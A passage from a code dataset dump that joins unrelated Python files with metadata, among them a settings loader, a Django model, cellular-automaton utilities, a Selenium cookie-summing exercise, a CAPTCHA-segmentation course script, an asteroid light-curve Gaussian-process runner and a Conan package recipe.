init_logging(__name__)\n\n\nclass Settings:\n \"\"\"\n Load and save methods to save class attributes of setting classes\n \"\"\"\n @staticmethod\n def load(obj: object, file):\n try:\n with open(file, 'r') as f:\n load_dict = json.load(f, encoding='utf-8')\n except Exception as e:\n print('Could not load setting data:\\n', e)\n return\n\n for key, attr in load_dict.items():\n setattr(obj, key, attr)\n\n @staticmethod\n def save(obj: object, file: Union[Path, str]):\n save_dict = dict()\n\n for key, value in obj.__dict__.items():\n if key.startswith('__'):\n # Skip internal attributes\n continue\n\n if not Settings.is_serializable(value):\n # Skip non-serializable data\n continue\n\n LOGGER.debug('Saving %s: %s', key, value)\n save_dict.update({key: value})\n\n try:\n with open(file, 'w') as f:\n json.dump(save_dict, f, indent='\\t')\n\n LOGGER.info('Saved settings to file: %s', file.absolute().as_posix())\n except Exception as e:\n LOGGER.error('Could not save file!\\n%s', e)\n\n @staticmethod\n def is_serializable(data: Any) -> bool:\n try:\n json.dumps(data)\n return True\n except Exception as e:\n LOGGER.debug(e)\n\n return False\n\n\nclass AppSettings:\n \"\"\"\n Store and Re-store application settings\n\n Settings are stored inside this class as class attributes(not instanced)\n \"\"\"\n # --- Default values ----\n 
app = dict(\n version='0.0.0',\n current_path='',\n introduction_shown=False,\n recent_files=list(),\n open_editor=False,\n editor_path='.',\n psd_size=(1920, 1080),\n window=(0, 0, 0, 0),\n resampling_filter='Bicubic'\n )\n\n language = 'de'\n\n log_queue = None\n\n @classmethod\n def load(cls) -> None:\n file = Path(cls.get_settings_path())\n\n if not file or not file.exists():\n print('Could not locate settings file! Using default settings!')\n return\n\n default_settings = dict()\n default_settings.update(cls.app)\n\n Settings.load(AppSettings, file)\n\n for k, v in default_settings.items():\n # Make sure all default keys exists if\n # settings are migrated from older version\n if k not in cls.app:\n cls.app[k] = v\n\n cls.setup_lang()\n print('AppSettings successfully loaded from file.')\n\n @classmethod\n def save(cls) -> None:\n file = Path(cls.get_settings_path())\n\n if not file:\n LOGGER.warning('Could not save settings file! No setting will be saved.')\n return\n\n Settings.save(cls, file)\n\n @staticmethod\n def setup_lang():\n setup_translation(language=AppSettings.language)\n print('Application language loaded from settings: ', AppSettings.language)\n\n @classmethod\n def load_ui_resources(cls) -> bool:\n \"\"\" update app globals with GUI resource paths \"\"\"\n ui_paths_file = Path(UI_PATH) / Path(UI_PATHS_FILE)\n\n if not ui_paths_file.exists():\n LOGGER.fatal('Could not locate gui resource file: %s. Aborting application.',\n ui_paths_file.absolute().as_posix())\n return False\n\n try:\n Settings.load(Resource, ui_paths_file)\n except Exception as e:\n LOGGER.fatal('Could not load GUI resources from file %s. Aborting application. Error:\\n%s',\n ui_paths_file.absolute().as_posix(), e)\n return False\n return True\n\n @classmethod\n def add_recent_file(cls, file: Union[Path, str], file_type: str='', list_length: int=10) -> None:\n if 'recent_files' not in cls.app.keys():\n cls.app['recent_files'] = list()\n\n file_str = Path(file).as_posix()\n recent_files = cls.app['recent_files']\n\n # Remove already existing/duplicate entry's\n for idx, entry in enumerate(recent_files):\n entry_file, entry_type = entry\n\n if file_str == entry_file and file_type == entry_type:\n recent_files.pop(idx)\n\n recent_files.insert(0, (file_str, file_type))\n\n # Only keep the last [list_length] number of items\n if len(recent_files) > list_length:\n recent_files = recent_files[:list_length]\n\n @staticmethod\n def get_settings_path() -> str:\n _knecht_settings_dir = get_settings_dir()\n _knecht_settings_file = os.path.join(_knecht_settings_dir, SETTINGS_FILE)\n\n return _knecht_settings_file\n","repo_name":"tappi287/tieflader","sub_path":"modules/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"42967346259","text":"from django.db import models\n\n# Create your models here.\n\n\ndef custom_upload_to(instance, filename):\n if instance.pk:\n try:\n old_instance = AboutMePerfil.objects.get(pk=instance.pk)\n old_instance.image.delete()\n print(old_instance.image)\n\n except AboutMePerfil.DoesNotExist as e:\n print(f\"MENSAJE DE ERRO--------{e}\")\n\n return 'perfilImg/' + filename\n\n\nclass AboutMePerfil(models.Model):\n\n title = models.CharField(max_length=100, verbose_name=\"Titulo\")\n description = models.TextField(verbose_name=\"Descripcion\")\n image = models.ImageField(verbose_name=\"Portada\",\n upload_to=custom_upload_to)\n created = 
models.DateTimeField(\n auto_now_add=True, verbose_name=\"Fechade creacion\")\n update = models.DateTimeField(\n auto_now=True, verbose_name=\"fecha de actualizacion\")\n\n class Meta:\n verbose_name = \"Perfil\"\n ordering = [\"-created\"]\n\n def __str__(self) -> str:\n return self.title\n","repo_name":"hernan1030/web_personal-django","sub_path":"portafolio/webportfolio/aboutme/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69865070766","text":"#!/usr/bin/env python\n\n# php2json.py - Converts PHP to a JSON-based abstract syntax tree\n# Usage: php2json.py < input.php > output.json\n\nimport sys\nfrom phply.phplex import lexer\nfrom phply.phpparse import make_parser\nimport json\n\ninput = sys.stdin\noutput = sys.stdout\nwith_lineno = True\n\ndef export(items):\n result = []\n if items:\n for item in items:\n if hasattr(item, 'generic'):\n item = item.generic(with_lineno=with_lineno)\n result.append(item)\n return result\ndef php2json(input_file, output_file):\n parser = make_parser()\n json.dump(export(parser.parse(input_file,\n lexer=lexer,\n tracking=with_lineno)),\n output_file, indent=2)\n output_file.write('\\n')\n","repo_name":"Jlan45/AnswerPHP","sub_path":"php2json.py","file_name":"php2json.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"2"} +{"seq_id":"18368514734","text":"import numpy as np\nfrom scipy.stats import entropy\nfrom sklearn.preprocessing import minmax_scale\n\n\ndef number_to_base(n: int, *, base: int, width: int) -> np.array:\n \"\"\"\n Convert a number into it's representation in argument weight and\n fixed width\n\n Args:\n n (int): Number to convert\n base (int): Base to represent number in\n width (int): Width of presentation (padding with 0s)\n\n Returns:\n np.array: Array of digits\n \"\"\"\n if n > (base**width) - 1:\n raise ValueError(\n (\n f\"{n} is outside the allotted width {width} \"\n \"of the representation in base {base}\"\n )\n )\n ret = np.zeros(width).astype(\"int\")\n idx = 0\n while n:\n ret[idx] = int(n % base)\n n //= base\n idx += 1\n return ret\n\n\ndef base_to_number(n, *, base):\n \"\"\"Convert number in base array back to an integer value\"\"\"\n return np.sum(n * (base ** np.arange(len(n))))\n\n\ndef rule_arr(n, idxs=None, perbs=None):\n \"\"\"\n Generate an array representing a ca-rule with possible deviations from that\n rule to create probabilistic update rules\n\n Args:\n n (int): Rule number to use as a base rule\n idxs (list): List of indices to apply perturbations\n perbs (list): List of perturbations corresponding to the indices list\n\n Returns:\n np.array: 2-D array representing the CA rule\n \"\"\"\n idxs = idxs or ()\n perbs = perbs or ()\n\n assert len(idxs) == len(\n perbs\n ), \"Index and perturbation lists must be the same length\"\n\n r = number_to_base(n, base=2, width=8).astype(\"float\")\n\n for j, k in zip(idxs, perbs):\n r[j] = r[j] - k if r[j] > 0 else r[j] + k\n\n rp = np.zeros((8, 2))\n rp[:, 1] = r\n rp[:, 0] = 1 - rp[:, 1]\n\n return rp\n\n\ndef joint_probability_map(r_array):\n \"\"\"\n Convert a rule array into conditional mapping from rules for joint\n probabilities\n\n Args:\n r_array (np.array): Update rule array to be converted\n\n Returns:\n np.array: 3d array representing the conditional update rules\n \"\"\"\n n_states = r_array.shape[1]\n ret = np.zeros((n_states, n_states, 
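\n        # axes: (state of left cell, state of right cell, 4-site neighbourhood index, 4 neighbourhood digits + joint probability)\n        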
n_states**4, 5))\n\n for i in range(0, n_states**2):\n\n k = number_to_base(i, base=n_states, width=2)\n\n for j in range(n_states**4):\n nb = number_to_base(j, base=n_states, width=4)\n a = base_to_number(nb[:3], base=n_states)\n b = base_to_number(nb[1:], base=n_states)\n ret[k[0], k[1], j, :4] = nb\n ret[k[0], k[1], j, 4] = r_array[a][k[0]] * r_array[b][k[1]]\n\n return ret\n\n\ndef model_runner(rule: np.array, steps: int, initial_state: np.array):\n \"\"\"\n Run the model for the argument initial state, update rule and number of\n steps. Currently only supports 2 states.\n\n Args:\n rule (np.array): Update rule array\n steps (int): Number of steps to run the model for\n initial_state (np.array): Initial state represented as a 1d array\n\n Returns:\n np.array: 4d array of joint probability distributions\n \"\"\"\n # Create rule mapping\n rule_map = joint_probability_map(rule)\n\n # Width of the array\n width = len(initial_state)\n\n # TODO: Extend to more than 2 states\n n_states = 2\n\n # Initial State\n s0 = np.array(initial_state)\n\n # Vector p(i)\n p0 = np.zeros((width, n_states), dtype=\"float64\")\n\n # Initialize probabilities from the initial state\n for i, j in enumerate(s0):\n p0[i, 1] = j\n p0[i, 0] = 1 - j\n\n # Shift probabilities array to the right\n shift_p0 = p0.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Initialize empty joint probability array with steps and width\n joint = np.zeros((steps, width, n_states, n_states), dtype=\"float64\")\n\n # And then get the joint (independent) probabilities\n joint[0, :, 0, 0] = p0[:, 0] * shift_p0[:, 0]\n joint[0, :, 1, 0] = p0[:, 1] * shift_p0[:, 0]\n joint[0, :, 0, 1] = p0[:, 0] * shift_p0[:, 1]\n joint[0, :, 1, 1] = p0[:, 1] * shift_p0[:, 1]\n\n # Update function called each step\n def update(x, y, l_arr, c_arr, r_arr, p_arr0, p_arr1):\n r_map = rule_map[x][y][:, :4].astype(\"int\")\n r_prob = rule_map[x][y][:, 4:]\n den = [p_arr0[:, r[1]] * p_arr1[:, r[2]] for r in r_map]\n num = [\n l_arr[:, r[0], r[1]] * c_arr[:, r[1], r[2]] * r_arr[:, r[2], r[3]]\n for r in r_map\n ]\n slices = [\n np.divide(n, d, out=np.zeros_like(n), where=d != 0)\n for n, d in zip(num, den)\n ]\n slices = np.multiply(r_prob, slices)\n return np.stack(slices).sum(axis=0)\n\n # Update each row in turn from previous row\n for i in range(1, joint.shape[0]):\n joint_t = joint[i - 1]\n\n # Left and right shifts\n shift_lt = joint_t.take(np.arange(-1, width - 1), mode=\"wrap\", axis=0)\n shift_rt = joint_t.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Per-site marginal probabilities\n probs = joint_t.sum(axis=2)\n\n # Shifted marginals\n probs_r = probs.take(np.arange(1, width + 1), mode=\"wrap\", axis=0)\n\n # Update each of the joint probabilities\n joint[i, :, 0, 0] = update(0, 0, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 1, 0] = update(1, 0, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 0, 1] = update(0, 1, shift_lt, joint_t, shift_rt, probs, probs_r)\n joint[i, :, 1, 1] = update(1, 1, shift_lt, joint_t, shift_rt, probs, probs_r)\n\n return joint\n\n\ndef mutual_info(arr):\n \"\"\"\n Calculate the mutual information of a joint probability array\n\n Args:\n arr (np.array): 4d joint probability array\n\n Returns:\n np.array: 2d mutual information array\n \"\"\"\n p0 = np.sum(arr, axis=3)\n p1 = np.sum(arr, axis=2)\n\n def sub_mut(i, j):\n m = p0[:, :, i] * p1[:, :, j]\n d = np.log(m, out=np.zeros_like(m), where=m != 0)\n log = np.log(\n arr[:, :, i, j],\n out=np.zeros_like(arr[:, :, i, j]),\n 
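# the where/out pair evaluates the log only at nonzero probabilities, leaving log(0) cells at 0 instead of -inf\n            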
where=arr[:, :, i, j] != 0,\n )\n return np.multiply(arr[:, :, i, j], log - d)\n\n m00 = sub_mut(0, 0)\n m10 = sub_mut(1, 0)\n m01 = sub_mut(0, 1)\n m11 = sub_mut(1, 1)\n\n return m00 + m10 + m01 + m11\n\n\ndef flat_joint_entropy(arr):\n \"\"\"\n Calculate the entropy of the flattened joint probability array\n\n Args:\n arr (np.array): 4d joint probability array\n\n Returns:\n np.array: 2d mutual information array\n \"\"\"\n return entropy(arr.reshape(arr.shape[0], arr.shape[1], -1), axis=2)\n\n\ndef min_max_scale_rows(arr):\n \"\"\"Min-scale across rows of a 2-d array\"\"\"\n return minmax_scale(arr, axis=1)\n\n\ndef checks(joint_prob_arr):\n \"\"\"\n Checks that the model is correctly producing probability distributions\n \"\"\"\n\n # Check that marginal probabilities are the same when\n # summed from left-to-right or right-to-left\n last_row = joint_prob_arr[-1]\n assert np.isclose(\n last_row.sum(axis=1),\n last_row.sum(axis=2).take(\n np.arange(1, last_row.shape[0] + 1), mode=\"wrap\", axis=0\n ),\n ).all()\n\n np.isclose(\n 1, np.sum(joint_prob_arr) / (joint_prob_arr.shape[0] * joint_prob_arr.shape[1])\n )\n\n print(\"Ok\")\n","repo_name":"zombie-einstein/probabilistic_ca","sub_path":"deprecated/ca_utils.py","file_name":"ca_utils.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"32552825473","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('balanceInquiry', views.balanceInquiry, name='balanceInquiry'),\n path('creditCardInquiry', views.creditCardInquiry, name='creditCardInquiry'),\n path('lastTransaction', views.lastTransaction, name='lastTransaction'),\n path('sendMoney', views.sendMoney, name='sendMoney')\n]","repo_name":"SaqibHasan057/Banking_Chatbot","sub_path":"bank/localDatabase/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12568097325","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# load in csv file\nfacilities = pd.read_csv(\"../../Data/Unprocessed/facilities.csv\")\n\n# show\nfacilities.head(5)\n# create list of facility columns\nfacil_col = ['ticket_vending_machine', 'luggage_lockers', 'free_parking', 'taxi', 'bicycle_spots', 'blue-bike',\n 'bus', 'tram', 'metro', 'wheelchair_available', 'ramp', 'disabled_parking_spots', 'elevated_platform',\n 'escalator_up', 'escalator_down', 'elevator_platform', 'audio_induction_loop']\n\n# check frequency of each variable\nfacilities[\"disabled_parking_spots\"].value_counts()\n\n# for the sake of this exercise, we will simply impute all missing values of the facilities with zero\nfor col in facil_col:\n facilities[col].fillna((0), inplace=True)\n\n# check if it worked\nfor col in facilities.columns:\n missings = len(facilities[col][facilities[col].isnull()]) / float(len(facilities))\n print(col, missings)\n\n# PROBLEM: disabled_parking_spots is the number of spots instead of a dummy indicator\n# so let's create a dummy variable\nfacilities['disabled_parking_spots_indicator'] = np.where(facilities['disabled_parking_spots']==0,0,1)\n\n# drop old variable and add new name to our list\nfacil_col.remove('disabled_parking_spots')\nfacil_col = facil_col + ['disabled_parking_spots_indicator']\n\n# show\nfacil_col\n\n\n# compute total number of facilities per station\nfacilities['number_facilities'] 
= facilities[facil_col].sum(axis = 1)\n\n# show\nfacilities['number_facilities']\n# prepare data for number of facilities in different stations\ninput_plot = pd.DataFrame(facilities['number_facilities'].value_counts())\n# show\ninput_plot\n# prepare dataset as input for pyplot because we want two columns to make a plot\ninput_plot['NumberFacilities'] = input_plot.index\ninput_plot = input_plot.rename(index=str, columns={'number_facilities': 'Occurence'})\n\n# show\ninput_plot\n# time to get plotting\nfig, ax = plt.subplots()\nplt.bar(input_plot['NumberFacilities'], input_plot['Occurence'])\nplt.locator_params(axis='x', nbins=len(input_plot))\nplt.xlabel('Number of facilities offered at the station')\nplt.ylabel('Number of stations offering this amount of facilities')\nplt.show()\n\n# import packages\nimport geopandas as gpd\n# read in file in geopandas data structure\nmap_df = gpd.read_file('../Data/BELGIUM_-_Provinces/BELGIUM_-_Provinces.shp')\n\n#show\nmap_df.head()\n# show\nmap_df.plot()\n# check unique province names in map_df\nmap_df[\"NE_Name\"].unique()\n# load self created excel file regarding inhabitant data (source: statbel)\ninh_df = pd.read_excel('../data/inhabitants_prov.xlsx')\n# show\ninh_df.head()\n# change column to the same name and then merge both tables\ninh_df = inh_df.rename(index=str, columns={'Province': 'NE_Name'})\n\n# merge\nmap_df = map_df.merge(inh_df, on='NE_Name')\n\n# show\nmap_df.head()\n# create figure and axes for Matplotlib\nfig, ax = plt.subplots(1, figsize=(10, 6))\n\n# use cmap = 'BuGn' to get nice color-shaded plot\nmap_df.plot(column='Inhabitants', cmap='BuGn', linewidth=0.8, ax=ax)\n# dictionary with location of Belgian universities\ndata = {'Name': ['Ugent', 'KULeuven', 'VUB'],\n        'lat': [51.046672, 50.877833, 50.822476],\n        'lon': [3.727708, 4.700250, 4.394807]}\n\n# create data frame\ndata_df = pd.DataFrame(data, columns = ['Name', 'lat', 'lon'])\n\n# plot\ndata_df.plot('lon', 'lat', 'scatter', color='red')\n# overlap with our map\nax = data_df.plot('lon', 'lat', 'scatter', color='red', zorder=2)\nmap_df.plot(column='Inhabitants', cmap='BuGn', linewidth=0.8, ax = ax, zorder = 1)\n\n","repo_name":"Seoyangsam/ACRM","sub_path":"src/bin_unused_files/GetYouStartedPt3.py","file_name":"GetYouStartedPt3.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"12793575908","text":"# https://stepik.org/lesson/715854/step/7?unit=716646\n\n# TASK\n# Open the site https://parsinger.ru/methods/3/index.html with Selenium;\n# Collect every cookie whose name ends in an even number after \"_\" and sum their values;\n# Paste the resulting number into the answer field.\nfrom pprint import pprint\nimport time\nfrom selenium import webdriver\n\nwith webdriver.Chrome() as webdriver:\n    webdriver.get('https://parsinger.ru/methods/3/index.html')\n    cookies = webdriver.get_cookies()\n    res = 0\n    for cookie in cookies:\n        if int(cookie['name'][-1]) % 2 == 0:\n            res += int(cookie['value'])\n    print(res)\n    time.sleep(10)\n# >1962101\n","repo_name":"sprinter4646/WEBparsing","sub_path":"5.5.7_ .zadacha .py","file_name":"5.5.7_ .zadacha .py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"16447930146","text":"import argparse\nimport textwrap\n\nimport pandas as pd\nimport h5py\n\n# from plotting import plot_mcmc_sampling_results\nfrom asterogap.GP import GPFit\n\nimport os\n\n# TODO: is 
this still needed?\nos.environ[\"MKL_NUM_THREADS\"] = \"3\"\n\n\ndef read_data(filename, datadir=\"./\", cols=None, whitespace=False):\n    \"\"\"\n    Read in light curve data from asteroid.\n    \"\"\"\n\n    if cols is None:\n        header = None\n        cols = [0, 1, 2]\n\n    else:\n        header = 0\n\n    data = pd.read_csv(datadir + filename, delim_whitespace=whitespace, header=header)\n\n    print(\"columns = \" + str(cols))\n\n    tsample = data[cols[0]]\n    fsample = data[cols[1]]\n    flux_err = data[cols[2]]\n\n    return tsample, fsample, flux_err\n\n\ndef write_data(filename, sampler, asteroid, nwalkers, niter, burn_in):\n    \"\"\"\n    Write the sampler results as an HDF5 file,\n    with all the other info you might want.\n    \"\"\"\n\n    # create a new filename ending\n    filename_new = filename.replace(filename.split(\".\")[-1], \"hdf5\")\n\n    with h5py.File(filename_new, \"w\") as f:\n        f.create_dataset(\"chain\", data=sampler.chain)\n\n        f.attrs[\"walkers\"] = nwalkers\n        f.attrs[\"iterations\"] = niter\n        f.attrs[\"data_pts\"] = asteroid.data_pts\n        f.attrs[\"acceptance_fraction\"] = sampler.acceptance_fraction\n        f.attrs[\"burn_in\"] = burn_in\n        f.create_dataset(\"time\", data=asteroid.time)\n        f.create_dataset(\"flux\", data=asteroid.flux)\n        f.create_dataset(\"flux_err\", data=asteroid.flux_err)\n\n\ndef main():\n    # read in the data file\n    print(\"\\nreading in data\")\n    time, flux, flux_err = read_data(filename, datadir, cols, whitespace)\n\n    # build the GP model unconditionally; kernel_long only toggles the long-term kernel\n    asteroid = GPFit(time, flux, flux_err, kernel_long)\n    if kernel_long:\n        print(\"\\nincluding long-term kernel\\nit's log unif!\")\n\n    print(\"\\nsetting kernel\")\n    asteroid.set_params()\n    asteroid.set_walker_param_matrix(nwalkers)\n    asteroid.set_gp_kernel()\n\n    print(\"\\nrunning mcmc\")\n    sampler = asteroid.run_emcee(\n        niter=niter, nwalkers=nwalkers, burn_in=burn_in, threads=threads\n    )\n\n    print(\"\\nwriting out results\")\n    write_data(filename, sampler, asteroid, nwalkers, niter, burn_in)\n\n    return\n\n\nif __name__ == \"__main__\":\n    # DEFINE PARSER FOR COMMAND LINE ARGUMENTS\n    parser = argparse.ArgumentParser(\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n        description=\" \",  # Bayesian QPO searches for burst light curves.\n        epilog=textwrap.dedent(\n            \"\"\"\n\n            NOTE! The first 3 columns of your input file \"-f\" must correspond to your\n            time, flux, and flux error in that order. 
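If -c/--columns is given instead, those three header names are used to pick the columns (e.g. -c time flux flux_err, assuming such headers exist in your file). 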
All columns beyond column 3 will be ignored.\n\n Examples\n --------\n\n Print this help message:\n\n $> python run_gp.py --help\n\n Run this script from anywhere on your system:\n\n $> python /absolute/path/to/asterogap/run_gp.py --help\n\n\n # Run on example data in the data directory:\n #\n # $> python /absolute/path/to/asterogap/run_gp.py -f \"2001SC170.csv\"\n # -d \"absolute/path/to/CometGP/data/asteroid_csv\"\n\n Run on example data (from example data directory) with more walkers, steps, etc.\n\n $> python ../code/run_gp.py -f \"2001SC170.csv\" -d \"./\" -w 50 -i 5000 -t 2\n\n\n \"\"\"\n ),\n )\n\n parser.add_argument(\n \"-f\",\n \"--filename\",\n action=\"store\",\n dest=\"filename\",\n required=True,\n help=\"Data file with observed time (in unit days) and flux.\",\n )\n parser.add_argument(\n \"-d\",\n \"--datadir\",\n action=\"store\",\n dest=\"datadir\",\n required=False,\n default=\"./\",\n help=\"Directory with the data (default: current directory).\",\n )\n parser.add_argument(\n \"-w\",\n \"--nwalkers\",\n action=\"store\",\n dest=\"nwalkers\",\n required=False,\n type=int,\n default=100,\n help=\"The number of walkers/chains for the MCMC run (default: 100).\",\n )\n parser.add_argument(\n \"-i\",\n \"--niter\",\n action=\"store\",\n dest=\"niter\",\n required=False,\n type=int,\n default=1000,\n help=\"The number of iterations per chain/walker in the MCMC run (default: 1000).\",\n )\n parser.add_argument(\n \"-t\",\n \"--threads\",\n action=\"store\",\n dest=\"threads\",\n required=False,\n type=int,\n default=1,\n help=\"The number of threads used for computing the posterior (default: 1).\",\n )\n\n parser.add_argument(\n \"-ws\",\n \"--whitespace\",\n action=\"store_true\",\n dest=\"whitespace\",\n required=False,\n default=False,\n help=\"The delimeter for the input file, assumed not to be whitespace.\",\n )\n\n parser.add_argument(\n \"-b\",\n \"--burn_in\",\n action=\"store\",\n dest=\"burn_in\",\n required=False,\n type=int,\n default=2000,\n help=\"The number of iterations to remove from the head of the MCMC chain walkers.\",\n )\n parser.add_argument(\n \"-k\",\n \"--kernel\",\n action=\"store_false\",\n dest=\"kernel\",\n required=False,\n default=True,\n help=\"Include a long-term lightcurve profile adjustment kernel.\",\n )\n parser.add_argument(\n \"-c\",\n \"--columns\",\n nargs=3,\n type=str,\n action=\"store\",\n dest=\"columns\",\n required=False,\n help=\"Specify which column names to use to extract time, flux, and flux error. 
Must be a string.\",\n )\n\n clargs = parser.parse_args()\n\n filename = clargs.filename\n datadir = clargs.datadir\n nwalkers = clargs.nwalkers\n niter = clargs.niter\n threads = clargs.threads\n whitespace = clargs.whitespace\n burn_in = clargs.burn_in\n kernel_long = clargs.kernel\n cols = clargs.columns\n\n main()\n","repo_name":"dirac-institute/asterogap","sub_path":"asterogap/run_gp.py","file_name":"run_gp.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"14004183509","text":"import cv2\nimport numpy as np\nimport os\nimport time as tm\n\nalpha = {'A': 0, 'B': 0, 'C': 0, 'D': 0, 'E': 0, 'F': 0, 'G': 0, 'H': 0, 'I': 0, 'J': 0, 'K': 0, 'L': 0, 'M': 0, 'N': 0, 'O': 0, 'P': 0, 'Q': 0, 'R': 0, 'S': 0, 'T': 0, 'U': 0, 'V': 0, 'W': 0, 'X': 0,'Y': 0, 'Z': 0}\n\ndef get_count(img, filename):\n width = 20\n height = 20\n dim = (width, height)\n\n proj = np.sum(img, axis=0)\n proj = np.clip(proj, 0, 255)\n\n new_proj = [proj[i]-proj[i+1] for i in range(len(proj)-1)]\n new_proj = np.array(new_proj).nonzero()[0]\n\n for i in range(0,len(new_proj),2):\n resized = cv2.resize(img[:, new_proj[i]:new_proj[i+1]], dim, interpolation = cv2.INTER_AREA)\n name = filename[i//2]\n path = \"./Train_data/\"+name+\"/\"+str(alpha[name])+\".png\"\n alpha[name] += 1\n cv2.imwrite(path, resized)\n\n return len(new_proj)/2\n\n\nif __name__ == \"__main__\":\n\n folder_path = \"../train/\"\n file_names = os.listdir(folder_path)\n \n dilatation_size = 1\n dilatation_type = 0\n element = cv2.getStructuringElement(dilatation_type, (2 * dilatation_size + 1, 2 * dilatation_size + 1),\n (dilatation_size, dilatation_size))\n \n # i = 0\n tic = tm.perf_counter()\n for file_name in file_names:\n\n img_rgb = cv2.imread(folder_path+file_name)\n img_hsv = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2HSV)\n\n h, s, v = cv2.split(img_hsv)\n\n _, s_thr = cv2.threshold(s, 100, 255, cv2.THRESH_BINARY)\n\n img = np.bitwise_and(s_thr, v)\n non_zeros = img.nonzero()\n img_nz = img[non_zeros]\n avg = np.average(img_nz)\n\n _, pre_final = cv2.threshold(img, avg, 255, cv2.THRESH_BINARY)\n\n final = cv2.erode(pre_final, element)\n \n char_count = get_count(final, file_name.split(\".\")[0])\n\n if char_count != len(file_name.split(\".\")[0]):\n print(\"----------------------\" + file_name + \"----------------------\")\n\n # i += 1\n # print(\"Image \" + str(i) + \" done!!!\")\n\n toc = tm.perf_counter()\n print(\"Time for storing Training Images = \" + str(toc-tic) + \"\\n\")\n","repo_name":"Nirav0312/courseProjects","sub_path":"DeCAPTCHA/genTrain.py","file_name":"genTrain.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2673292700","text":"from conans import ConanFile, CMake, tools\nimport os\nimport textwrap\n\nrequired_conan_version = \">=1.43.0\"\n\n\nclass AmqpcppConan(ConanFile):\n name = \"amqp-cpp\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/CopernicaMarketingSoftware/AMQP-CPP\"\n topics = (\"amqp\", \"network\", \"queue\")\n license = \"Apache-2.0\"\n description = \"C++ library for asynchronous non-blocking communication with RabbitMQ\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"linux_tcp_module\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n 
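# enabling this pulls in OpenSSL through requirements() below\n        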
\"linux_tcp_module\": True,\n }\n\n generators = \"cmake\"\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n del self.options.linux_tcp_module\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n if self.options.get_safe(\"linux_tcp_module\"):\n self.requires(\"openssl/1.1.1q\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"AMQP-CPP_BUILD_SHARED\"] = self.options.shared\n self._cmake.definitions[\"AMQP-CPP_BUILD_EXAMPLES\"] = False\n self._cmake.definitions[\"AMQP-CPP_LINUX_TCP\"] = self.options.get_safe(\"linux_tcp_module\") or False\n self._cmake.configure(build_folder=self._build_subfolder)\n return self._cmake\n\n def _patch_sources(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n\n def build(self):\n self._patch_sources()\n cmake = self._configure_cmake()\n cmake.install()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(\"LICENSE\", src=self._source_subfolder, dst=\"licenses\", keep_path=False)\n tools.rmdir(os.path.join(self.package_folder, \"cmake\"))\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self._create_cmake_module_alias_targets(\n os.path.join(self.package_folder, self._module_file_rel_path),\n {\"amqpcpp\": \"amqpcpp::amqpcpp\"}\n )\n\n @staticmethod\n def _create_cmake_module_alias_targets(module_file, targets):\n content = \"\"\n for alias, aliased in targets.items():\n content += textwrap.dedent(\"\"\"\\\n if(TARGET {aliased} AND NOT TARGET {alias})\n add_library({alias} INTERFACE IMPORTED)\n set_property(TARGET {alias} PROPERTY INTERFACE_LINK_LIBRARIES {aliased})\n endif()\n \"\"\".format(alias=alias, aliased=aliased))\n tools.save(module_file, content)\n\n @property\n def _module_file_rel_path(self):\n return os.path.join(\"lib\", \"cmake\", \"conan-official-{}-targets.cmake\".format(self.name))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"amqpcpp\")\n self.cpp_info.set_property(\"cmake_target_name\", \"amqpcpp\")\n self.cpp_info.set_property(\"pkg_config_name\", \"amqpcpp\")\n self.cpp_info.libs = [\"amqpcpp\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs = [\"dl\", 